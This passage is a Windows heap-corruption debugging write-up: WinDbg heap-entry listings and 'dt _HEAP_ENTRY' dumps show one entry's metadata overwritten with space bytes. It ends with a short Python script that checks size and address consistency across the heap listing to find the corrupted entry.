    00a77668: 00168 . 00198 [01] - busy (190)
    00a77800: 00198 . 001f8 [01] - busy (1ec)
    00a779f8: 001f8 . 00188 [01] - busy (17c)
    00a77b80: 00188 . 00170 [01] - busy (164)
    00a77cf0: 00170 . 00170 [01] - busy (168)
    00a77e60: 00170 . 00178 [01] - busy (170)
    00a77fd8: 00178 . 00198 [01] - busy (18c)
    00a78170: 00198 . 001f8 [01] - busy (1ec)
    00a78368: 001f8 . 00170 [01] - busy (164)
    00a784d8: 00170 . 00170 [01] - busy (164)
    00a78648: 00170 . 00168 [01] - busy (15c)
    00a787b0: 00168 . 001b8 [01] - busy (1b0)
    00a78968: 001b8 . 00180 [01] - busy (174)
    00a78ae8: 00180 . 00188 [01] - busy (180)
    00a78c70: 00188 . 00100 [00]
    00a78d70: 00100 . 00180 [01] - busy (174)
    00a78ef0: 00180 . 00608 [01] - busy (600)
    00a794f8: 00608 . 00208 [01] - busy (200)
    00a79700: 00208 . 00188 [01] - busy (180)
    00a79888: 00188 . 00608 [01] - busy (600)
    00a79e90: 00608 . 00308 [01] - busy (300)
    00a7a198: 00308 . 00220 [01] - busy (214)
    00a7a3b8: 00220 . 003f8 [00]
    00a7a7b0: 003f8 . 003d0 [01] - busy (3c2)
    00a7ab80: 003d0 . 00248 [01] - busy (240)
    00a7adc8: 00248 . 00318 [01] - busy (30f)
    00a7b0e0: 00318 . 00228 [01] - busy (21e)
    00a7b308: 00228 . 00378 [01] - busy (370)
    00a7b680: 00378 . 00168 [01] - busy (160)
    00a7b7e8: 00168 . 00278 [01] - busy (270)
    00a7ba60: 00278 . 001e0 [01] - busy (1d8)
    00a7bc40: 001e0 . 00520 [01] - busy (518)
    00a7c160: 00520 . 00268 [01] - busy (25e)
    00a7c3c8: 00268 . 00178 [01] - busy (16f)
    00a7c540: 00178 . 00120 [01] - busy (116)
    00a7c660: 00120 . 00170 [01] - busy (167)
    00a7c7d0: 00170 . 00268 [01] - busy (25a)
    00a7ca38: 00268 . 003d8 [01] - busy (3cf)
    00a7ce10: 003d8 . 004d0 [01] - busy (4c2)
    00a7d2e0: 004d0 . 00408 [01] - busy (3fa)
    00a7d6e8: 00408 . 00118 [01] - busy (10c)
    00a7d800: 00118 . 00118 [01] - busy (10c)
    00a7d918: 00118 . 001a0 [01] - busy (197)
    00a7dab8: 001a0 . 00118 [01] - busy (10c)
    00a7dbd0: 00118 . 00608 [01] - busy (600)
    00a7e1d8: 00608 . 001e0 [01] - busy (1d8)
    00a7e3b8: 001e0 . 00188 [01] - busy (17b)
    00a7e540: 00188 . 00228 [01] - busy (21b)
    00a7e768: 00228 . 00068 [01] - busy (5c)
    00a7e7d0: 00068 . 00010 [01] - busy (4)
    00a7e7e0: 00010 . 00160 [01] - busy (154)
    00a7e940: 00160 . 00188 [01] - busy (180)
    00a7eac8: 00188 . 00160 [01] - busy (158)
    00a7ec28: 00160 . 00188 [01] - busy (180)
    00a7edb0: 00188 . 00160 [01] - busy (154)
    00a7ef10: 00160 . 00188 [01] - busy (180)
    00a7f098: 00188 . 00c08 [01] - busy (c00)
    00a7fca0: 00c08 . 001a8 [01] - busy (1a0)
    00a7fe48: 001a8 . 00188 [01] - busy (180)
    00a7ffd0: 00188 . 00018 [01] - busy (c)
    00a7ffe8: 00018 . 00018 [11] - busy (c)
    Segment02 at 00a80000:
    Flags: 00000000
    Base: 00a80000
    First Entry: 00a80040
    Last Entry: 00c80000
    Total Pages: 00000200
    Total UnCommit: 00000175
    Largest UnCommit: 00172000
    UnCommitted Ranges: (2)
    00acb000: 00003000
    00b0e000: 00172000
    
    Heap entries for Segment02 in Heap 00970000
    00a80000: 00000 . 00040 [01] - busy (40)
    00a80040: 00040 . 40008 [01] - busy (40000)
    00ac0048: 40008 . 00170 [01] - busy (164)
    00ac01b8: 00170 . 01808 [01] - busy (1800)
    00ac19c0: 01808 . 00408 [01] - busy (400)
    00ac1dc8: 00408 . 000c8 [01] - busy (c0)
    00ac1e90: 000c8 . 000c8 [01] - busy (c0)
    00ac1f58: 000c8 . 000a8 [01] - busy (93)
    00ac2000: 000a8 . 03008 [01] - busy (3000)
    00ac5008: 03008 . 00460 [01] - busy (453)
    00ac5468: 00460 . 00190 [01] - busy (188)
    00ac55f8: 00190 . 00188 [01] - busy (180)
    00ac5780: 00188 . 00170 [01] - busy (164)
    00ac58f0: 00170 . 00170 [01] - busy (164)
    00ac5a60: 00170 . 000d0 [00]
    00ac5b30: 000d0 . 001a0 [01] - busy (196)
    00ac5cd0: 001a0 . 001e0 [01] - busy (1d8)
    00ac5eb0: 001e0 . 05150 [10]
    00acb000: 00003000 - uncommitted bytes.
    00ace000: 00000 . 00018 [01] - busy (10)
    00ace018: 00018 . 00018 [01] - busy (10)
    00ace030: 00018 . 00198 [01] - busy (18f)
    00ace1c8: 00198 . 001e8 [01] - busy (1d9)
    00ace3b0: 001e8 . 00118 [01] - busy (10f)
    00ace4c8: 00118 . 003f8 [01] - busy (3eb)
    00ace8c0: 003f8 . 00168 [01] - busy (15a)
    00acea28: 00168 . 003e8 [01] - busy (3dc)
    00acee10: 003e8 . 001e0 [01] - busy (1d7)
    00aceff0: 001e0 . 00130 [01] - busy (128)
    00acf120: 00130 . 00030 [00]
    00acf150: 00030 . 001e0 [01] - busy (1d8)
    00acf330: 001e0 . 00160 [01] - busy (154)
    00acf490: 00160 . 001e0 [01] - busy (1d8)
    00acf670: 001e0 . 00160 [01] - busy (154)
    00acf7d0: 00160 . 001e0 [01] - busy (1d8)
    00acf9b0: 001e0 . 000c8 [01] - busy (c0)
    00acfa78: 000c8 . 00160 [01] - busy (158)
    00acfbd8: 00160 . 001e0 [01] - busy (1d8)
    00acfdb8: 001e0 . 00188 [01] - busy (180)
    00acff40: 00188 . 0c008 [01] - busy (c000)
    00adbf48: 0c008 . 20020 [01] - busy (20015)
    00afbf68: 20020 . 10020 [01] - busy (10015)
    00b0bf88: 10100 . 10100 [20]
    unable to read heap entry at 00b1c088
    
    The error message shown by WinDbg, "unable to read heap entry at ..", partially confirms that this is a sign of memory/heap corruption.
    
    0:000> dt _HEAP_ENTRY 00adbf48
    ntdll!_HEAP_ENTRY
     +0x000 Size : 0x4004
     +0x002 PreviousSize : 0x1801
     +0x000 SubSegmentCode : 0x18014004 
     +0x004 SmallTagIndex: 0xc3 ''
     +0x005 Flags: 0x1 ''
     +0x006 UnusedBytes: 0xb ''
     +0x007 SegmentIndex : 0x2 ''
    
    			
    0:000> dt _HEAP_ENTRY 00afbf68
    ntdll!_HEAP_ENTRY
     +0x000 Size : 0x2004
     +0x002 PreviousSize : 0x4004
     +0x000 SubSegmentCode : 0x40042004 
     +0x004 SmallTagIndex: 0xc7 ''
     +0x005 Flags: 0x1 ''
     +0x006 UnusedBytes: 0xb ''
     +0x007 SegmentIndex : 0x2 ''
    
    The above two entries make sense: Size and PreviousSize match for both of them. Now let's dissect the last entry.
    
    0:000> dt _HEAP_ENTRY 00b0bf88
    ntdll!_HEAP_ENTRY
     +0x000 Size : 0x2020
     +0x002 PreviousSize : 0x2020
     +0x000 SubSegmentCode : 0x20202020 
     +0x004 SmallTagIndex: 0x20 ' '
     +0x005 Flags: 0x20 ' '
     +0x006 UnusedBytes: 0x20 ' '
     +0x007 SegmentIndex : 0x20 ' '
    
    From the above WinDbg output, it can be seen that the metadata of 0x00b0bf88 is completely corrupted and overwritten with 0x20s, which are nothing but spaces.
    
    0:000> dd 00b0bf88
    00b0bf88  20202020 20202020 20202020 20202020
    00b0bf98  20202020 20202020 20202020 20202020
    00b0bfa8  20202020 20202020 20202020 20202020
    00b0bfb8  20202020 20202020 20202020 20202020
    00b0bfc8  20202020 20202020 20202020 20202020
    00b0bfd8  20202020 20202020 20202020 20202020
    00b0bfe8  20202020 20202020 20202020 20202020
    00b0bff8  20202020 20202020 20202020 20202020
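
The manual check above (each entry's PreviousSize must equal the Size of the entry before it) can be automated for triage of a crash dump. The following is an added example, not part of the original write-up: it walks the heap listing lines shown on this page and decodes an 8-byte header using the `_HEAP_ENTRY` layout from the `dt` output. The function names and the `fill_byte` field are assumptions made for illustration.

```python
import re
import struct

GRANULARITY = 8  # the header stores sizes in 8-byte units; the listing shows bytes

# "address: prev_size . size [flags]" as printed in the heap listing above
ENTRY_RE = re.compile(
    r"^\s*([0-9a-f]{8}):\s*([0-9a-f]{5})\s*\.\s*([0-9a-f]{5})\s*\[([0-9a-f]{2})\]",
    re.IGNORECASE,
)

# Last entries of Segment02, copied from the listing on this page.
LISTING = """\
00acfa78: 000c8 . 00160 [01] - busy (158)
00acfbd8: 00160 . 001e0 [01] - busy (1d8)
00acfdb8: 001e0 . 00188 [01] - busy (180)
00acff40: 00188 . 0c008 [01] - busy (c000)
00adbf48: 0c008 . 20020 [01] - busy (20015)
00afbf68: 20020 . 10020 [01] - busy (10015)
00b0bf88: 10100 . 10100 [20]
"""


def decode_heap_entry(raw):
    """Decode the 8-byte header laid out as in the dt _HEAP_ENTRY output."""
    size, prev, tag, flags, unused, seg = struct.unpack("<HHBBBB", raw[:8])
    return {
        "size_bytes": size * GRANULARITY,
        "prev_size_bytes": prev * GRANULARITY,
        "small_tag_index": tag,
        "flags": flags,
        "unused_bytes": unused,
        "segment_index": seg,
        # A header made of one repeated byte is data written over metadata.
        "fill_byte": raw[0] if len(set(raw[:8])) == 1 else None,
    }


def find_chain_breaks(listing):
    """Return (address, kind, expected, found) for each inconsistent entry."""
    breaks = []
    prev = None  # (address, size) of the preceding entry
    for line in listing.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            prev = None  # uncommitted range or other text: the chain restarts
            continue
        addr, prev_size, size = (int(m.group(i), 16) for i in (1, 2, 3))
        if prev is not None:
            p_addr, p_size = prev
            if addr != p_addr + p_size:
                breaks.append((addr, "address", p_addr + p_size, addr))
            if prev_size != p_size:
                breaks.append((addr, "prev-size", p_size, prev_size))
        prev = (addr, size)
    return breaks


if __name__ == "__main__":
    for addr, kind, expected, found in find_chain_breaks(LISTING):
        print("%08x: %s mismatch, expected %05x, found %05x"
              % (addr, kind, expected, found))
    # First 8 bytes at 00b0bf88 as shown by the dd output: all spaces.
    print(decode_heap_entry(b"\x20" * 8))
```

Run against the listing, the only entry reported is 00b0bf88, the same one the `dt` output shows overwritten with spaces.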